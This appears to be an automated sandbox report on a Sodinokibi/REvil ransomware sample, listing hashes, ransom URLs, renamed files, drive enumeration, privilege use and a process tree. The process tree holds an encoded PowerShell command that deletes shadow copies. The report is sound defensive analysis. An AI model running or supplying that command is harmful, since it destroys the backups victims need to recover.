Analysis
-
max time kernel
141s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
21-10-2020 10:24
Static task
static1
Behavioral task
behavioral1
Sample
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
Resource
win7
Behavioral task
behavioral2
Sample
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
Resource
win10
General
-
Target
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe
-
Size
339KB
-
MD5
a976d4247a7f411914a8d9caaa8efc09
-
SHA1
ed7e0f161617547b89e41653c671b475cf6a4dd9
-
SHA256
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88
-
SHA512
4abe367dfe139c429d4fb71f58c4ba72a6fd9f9906475a1d43c0971a1fa054de332a7854c3e3d3de22032c5838450618173be2cb0553bb5efdf21eea209d849a
Malware Config
Extracted
C:\001715yzkz-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/DFF35A85FE3383AA
http://decryptor.cc/DFF35A85FE3383AA
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exedescription ioc process File renamed C:\Users\Admin\Pictures\RedoDeny.tif => \??\c:\users\admin\pictures\RedoDeny.tif.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File renamed C:\Users\Admin\Pictures\ReadClose.crw => \??\c:\users\admin\pictures\ReadClose.crw.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File renamed C:\Users\Admin\Pictures\ResetMerge.crw => \??\c:\users\admin\pictures\ResetMerge.crw.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File renamed C:\Users\Admin\Pictures\SendInvoke.png => \??\c:\users\admin\pictures\SendInvoke.png.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File renamed C:\Users\Admin\Pictures\SelectRevoke.tiff => \??\c:\users\admin\pictures\SelectRevoke.tiff.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File renamed C:\Users\Admin\Pictures\StopConvert.png => \??\c:\users\admin\pictures\StopConvert.png.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\users\admin\pictures\SelectRevoke.tiff ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File renamed C:\Users\Admin\Pictures\GroupBlock.crw => \??\c:\users\admin\pictures\GroupBlock.crw.001715yzkz ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exedescription ioc process File opened (read-only) \??\E: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\M: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\K: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\L: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\Y: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\F: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\G: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\I: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\J: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\N: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\Q: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\T: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\U: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\A: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\B: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\H: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\V: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\D: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\S: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\W: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\X: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\Z: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\O: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\P: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened (read-only) \??\R: ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\84l49qge5sv.bmp" ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe -
Drops file in Program Files directory 26 IoCs
Processes:
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exedescription ioc process File opened for modification \??\c:\program files\DisableExport.ttf ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\EnableOpen.M2V ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\ExpandUnlock.ppsm ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\RedoClear.jpg ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\RestartResume.AAC ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\SubmitRead.001 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\SwitchProtect.tif ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File created \??\c:\program files (x86)\001715yzkz-readme.txt ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\RemoveAdd.mht ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\SkipRemove.bmp ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\SuspendSubmit.001 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\UndoJoin.html ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\UninstallFind.odp ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\UnregisterProtect.DVR-MS ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\CompleteDismount.snd ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\BackupWrite.vstm ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\RegisterLimit.wps ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\RegisterReset.dxf ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\RestartPop.avi ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\TraceExpand.potx ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\UseSave.ttc ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File created \??\c:\program files\001715yzkz-readme.txt ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\ResolveTest.inf ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\WriteInvoke.ogg ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\WriteWatch.scf ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe File opened for modification \??\c:\program files\ConvertToGet.pps ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe -
Program crash 12 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1912 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 2532 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 988 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 2420 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 3712 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 1976 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 2632 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 3276 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 2244 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 200 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 3464 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 4024 3016 WerFault.exe ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe -
Suspicious behavior: EnumeratesProcesses 183 IoCs
Processes:
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid process 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 1912 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 2532 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 988 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe 2420 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
Processes:
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exeWerFault.exepowershell.exeWerFault.exevssvc.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe Token: SeRestorePrivilege 1912 WerFault.exe Token: SeBackupPrivilege 1912 WerFault.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeDebugPrivilege 1912 WerFault.exe Token: SeDebugPrivilege 2532 WerFault.exe Token: SeBackupPrivilege 3220 vssvc.exe Token: SeRestorePrivilege 3220 vssvc.exe Token: SeAuditPrivilege 3220 vssvc.exe Token: SeDebugPrivilege 988 WerFault.exe Token: SeDebugPrivilege 2420 WerFault.exe Token: SeTakeOwnershipPrivilege 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe Token: SeDebugPrivilege 3712 WerFault.exe Token: SeDebugPrivilege 1976 WerFault.exe Token: SeDebugPrivilege 2632 WerFault.exe Token: SeDebugPrivilege 3276 WerFault.exe Token: SeDebugPrivilege 2244 WerFault.exe Token: SeDebugPrivilege 200 WerFault.exe Token: SeDebugPrivilege 3464 WerFault.exe Token: SeDebugPrivilege 4024 WerFault.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exedescription pid process target process PID 3016 wrote to memory of 1524 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe powershell.exe PID 3016 wrote to memory of 1524 3016 ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe"C:\Users\Admin\AppData\Local\Temp\ef97612bb189177026481938c1e40e80a61bf504f7e491367b206b9f87700d88.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 6562⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 8082⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 8402⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 8842⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 9242⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3712 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 10682⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1976 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 11202⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 9922⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3276 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 12642⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2244 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 12482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:200 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 8682⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 8522⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3220
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1052
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/200-42-0x0000000004230000-0x0000000004231000-memory.dmpFilesize
4KB
-
memory/200-45-0x0000000004A60000-0x0000000004A61000-memory.dmpFilesize
4KB
-
memory/988-14-0x0000000004EC0000-0x0000000004EC1000-memory.dmpFilesize
4KB
-
memory/1524-3-0x00007FFF5D200000-0x00007FFF5DBEC000-memory.dmpFilesize
9.9MB
-
memory/1524-7-0x000001E06D570000-0x000001E06D571000-memory.dmpFilesize
4KB
-
memory/1524-8-0x000001E06E0C0000-0x000001E06E0C1000-memory.dmpFilesize
4KB
-
memory/1524-2-0x0000000000000000-mapping.dmp
-
memory/1912-5-0x00000000042A0000-0x00000000042A1000-memory.dmpFilesize
4KB
-
memory/1912-4-0x00000000042A0000-0x00000000042A1000-memory.dmpFilesize
4KB
-
memory/1976-29-0x00000000053B0000-0x00000000053B1000-memory.dmpFilesize
4KB
-
memory/1976-26-0x0000000004E80000-0x0000000004E81000-memory.dmpFilesize
4KB
-
memory/2244-41-0x0000000005240000-0x0000000005241000-memory.dmpFilesize
4KB
-
memory/2244-38-0x0000000004910000-0x0000000004911000-memory.dmpFilesize
4KB
-
memory/2420-18-0x0000000004090000-0x0000000004091000-memory.dmpFilesize
4KB
-
memory/2532-10-0x00000000045C0000-0x00000000045C1000-memory.dmpFilesize
4KB
-
memory/2532-13-0x0000000004BF0000-0x0000000004BF1000-memory.dmpFilesize
4KB
-
memory/2632-30-0x0000000004990000-0x0000000004991000-memory.dmpFilesize
4KB
-
memory/2632-33-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/3016-1-0x00000000026F0000-0x00000000026F1000-memory.dmpFilesize
4KB
-
memory/3016-0-0x0000000000AC0000-0x0000000000AC1000-memory.dmpFilesize
4KB
-
memory/3276-37-0x00000000051D0000-0x00000000051D1000-memory.dmpFilesize
4KB
-
memory/3276-34-0x0000000004BA0000-0x0000000004BA1000-memory.dmpFilesize
4KB
-
memory/3464-46-0x0000000004760000-0x0000000004761000-memory.dmpFilesize
4KB
-
memory/3464-49-0x0000000004F90000-0x0000000004F91000-memory.dmpFilesize
4KB
-
memory/3712-22-0x0000000004470000-0x0000000004471000-memory.dmpFilesize
4KB
-
memory/4024-50-0x00000000045A0000-0x00000000045A1000-memory.dmpFilesize
4KB
-
memory/4024-54-0x0000000004DD0000-0x0000000004DD1000-memory.dmpFilesize
4KB